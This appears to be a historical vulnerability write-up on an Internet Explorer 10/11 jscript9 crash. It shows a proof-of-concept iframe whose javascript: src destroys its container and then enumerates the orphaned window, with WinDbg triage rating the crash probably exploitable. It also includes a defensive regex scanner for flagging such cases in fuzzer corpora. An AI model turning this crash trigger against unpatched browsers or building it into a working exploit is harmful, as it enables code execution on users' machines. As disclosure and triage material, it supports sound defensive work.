Inserting an iFrame whose src attribute is a javascript: URL that simultaneously destroys the iFrame and calls Object.getOwnPropertyNames(window) crashes the browser. The crash was classified PROBABLY_EXPLOITABLE — data from the faulting address controls code flow.

function main() {
    document.getElementById("myDiv").innerHTML =
        '<iframe src="javascript:parent.document.getElementById(\'myDiv\').innerHTML = 1;' +
        'Object.getOwnPropertyNames(window)"></iframe>';
}

The iFrame destroys its own container by setting the innerHTML of myDiv in the parent document to 1, then immediately calls Object.getOwnPropertyNames on its now-orphaned window object. The WinDbg session showed a null pointer read in jscript9!Js::CustomExternalObject::GetEnumerator, with the data from the faulting address later used as a branch target. Tested on IE10 / IE11 build 20130312-2100.
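
For triaging a fuzzer corpus or saved pages for this shape (a javascript: iframe that writes into the parent document and then keeps executing), a heuristic scanner can flag candidates for regression testing. This is an added example, not code from the original post; the function names, verdict strings and the sample markup other than the first iframe are constructed for illustration.

```javascript
// Added example: heuristic triage, not an HTML or JavaScript parser.
// It does not decode HTML entities and splits statements naively on ';'.

// A statement that writes into the parent (or top) document.
const PARENT_WRITE =
  /\b(?:parent|top)\.document\b[^;]*(?:\.(?:innerHTML|outerHTML)\s*=(?!=)|\.(?:removeChild|replaceChild)\s*\()/;

// Collect the quoted src value of every <iframe> tag.
function iframeSrcs(html) {
  const tagRe = /<iframe\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)')/gi;
  const srcs = [];
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    srcs.push(m[1] !== undefined ? m[1] : m[2]);
  }
  return srcs;
}

// Classify one src value by where the parent write sits in the script.
function classifyFrameSrc(src) {
  const trimmed = src.trim();
  if (!/^javascript:/i.test(trimmed)) return "not-script";
  const stmts = trimmed.replace(/^javascript:/i, "")
    .split(";").map((s) => s.trim()).filter(Boolean);
  const i = stmts.findIndex((s) => PARENT_WRITE.test(s));
  if (i === -1) return "no-parent-write";
  // Statements after the write run in a frame whose container may be gone.
  return i < stmts.length - 1 ? "write-then-continue" : "write-last";
}

function scan(html) {
  return iframeSrcs(html).map((src) => ({ src, verdict: classifyFrameSrc(src) }));
}

// Constructed sample: the post's iframe plus two benign frames.
const SAMPLE_HTML = `
<iframe src="javascript:parent.document.getElementById('myDiv').innerHTML = 1;Object.getOwnPropertyNames(window)"></iframe>
<iframe src="https://example.test/widget"></iframe>
<iframe src="javascript:document.title = 'loaded'"></iframe>`;

for (const r of scan(SAMPLE_HTML)) console.log(r.verdict, "<-", r.src);
```

A "write-then-continue" verdict only marks a test case worth replaying against the engine under test; it says nothing about whether that engine mishandles it.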

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.